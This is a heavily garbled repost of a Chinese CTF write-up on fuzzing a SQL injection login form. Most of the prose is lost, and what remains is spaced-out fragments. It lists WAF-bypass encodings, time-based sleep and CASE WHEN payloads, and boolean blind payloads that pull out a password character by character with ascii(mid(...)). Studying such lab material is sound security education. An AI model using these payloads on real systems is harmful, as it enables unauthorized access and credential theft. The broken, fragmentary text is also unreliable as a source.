[13475] 2018-11-29_SQL注入常规Fuzz全记录

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2018-11-29_SQL注入常规Fuzz全记录 S Q L F u z z C o n a n   F r e e B u f   2 0 1 8 - 1 1 - 2 9 c t f   b u g k u s q l   : f u z z f u z z 便 便 w e b   s q l   f u z z 1 . 访
2 . a d m i n / 1 2 3 4 5 6 , a d m i n s q l 3 . f u z z   b u r p p a y l o a d : 4 . f u z z ( 1 ) p a y l o a d ( - - + # ) ( 2 ) f u z z
f u z z ( w a f w a f , f u z z p a y l o a d ) f u z z 3 7 0 w a     % 0 a   % 0 b   % 0 d   % a 0 ( 3 ) f u z z a n d   o r   o r d e r   u n i o n   f o r   , m i d (   x x   f r o m   x x   f o r   x x ) m i d ( x x , 1 , 1 )
( 4 ) f u z z ( s l e e p , )
o r   a n d w a i n f o r m a t i o n s c h e m a o r i n f o r m a t i o n s c h e m a ( 5 ) / ! /     t a b   % a 0   % 0 d % 0 a c a s e   w h e n f u z z % 0 0 % f f i f ( 1 = 1 , s l e e p ( 5 ) , 0 ) C A S E   W H E N   ( 1 = 1 )   T H E N   ( s l e e p ( 5 ) )   E L S E   ( 2 )   E N D ( C A S E   W H E N ( 1 = 1 ) T H E N ( s l e e p ( 1 ) ) E L S E ( 1 ) E N D ) ;
( w a , w a s q l ) ( 6 ) 使 i f c a s e / w h e n , 使 b o o l ( = )   a d m i n p a y l o a d :   ' + s l e e p ( 5 ) + '   ( + % 2 b ) m y s q l 1 0 a d m i n 1 0 ( 7 ) m i d ( x x x , 1 , 1 ) m i d ( x x x   f r o m   1   f o r   1 ) , 使 m i d ( x x x   f r o m   1 ) , , a s c i i a s c i i ( m i d ( x x x   f r o m   1 ) ) a s c i i a s c i i ( m i d ( x x x f r o m   2 ) ) a s c i i a d m i n ' + 1 + '   ( f a l s e , + % 2 b ) a d m i n ' + 0 + '   ( t r u e , + % 2 b ) s e l e c t   *   f r o m   u s e r   w h e r e   n a m e = ' a d m i n ' + 1 + ' '   a n d   p a s s w d = ' 1 2 3 4 5 6 ' ; ( f a l s e )   = = > s e l e c t   *   f r o m   u s e r   w h e r e   n a m e = ' a d m i n ' + 0 + ' '   a n d   p a s s w d = ' 1 2 3 4 5 6 ' ; ( t r u e )   = = > s e l e c t   ' a d m i n ' = ' a d m i n ' + 0   u n i o n   s e l e c t   ' a d m i n ' = ' a d m i n ' + 1 ;
( 8 ) b u r p a . p a s s w d :   3 2 ( p o s t p a s s w d p a s s w d i n f o r m a t i o n _ s c h e m a p a s s w d ) b . p a y l o a d r e v e r s e , p a y l o a d a s c i i ( ) a d m i n ' - ( l e n g t h ( p a s s w d ) = 4 8 ) - ' = a d m i n ' - ( a s c i i ( m i d ( R E V E R S E ( M I D ( ( p a s s w d ) f r o m ( - 1 ) ) ) f r o m ( - 1 ) ) ) = 4 8 ) - ' = a d m i n ' - ( a s c i i ( m i d ( p a s s w d ) f r o m ( 1 ) ) = 4 8 ) - '
3 2 0 0 5 b 8 1 f d 9 6 0 f 6 1 5 0 5 2 3 7 d b b 7 a 3 2 0 2 9 1 0 a d m i n 1 2 3 f l a g , 1 . f u z z s q l m a p m y s q l 2 . f u z z f u z z f u z z f u z z , f u z z   p a y l o a d 3 . * C o n a n F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则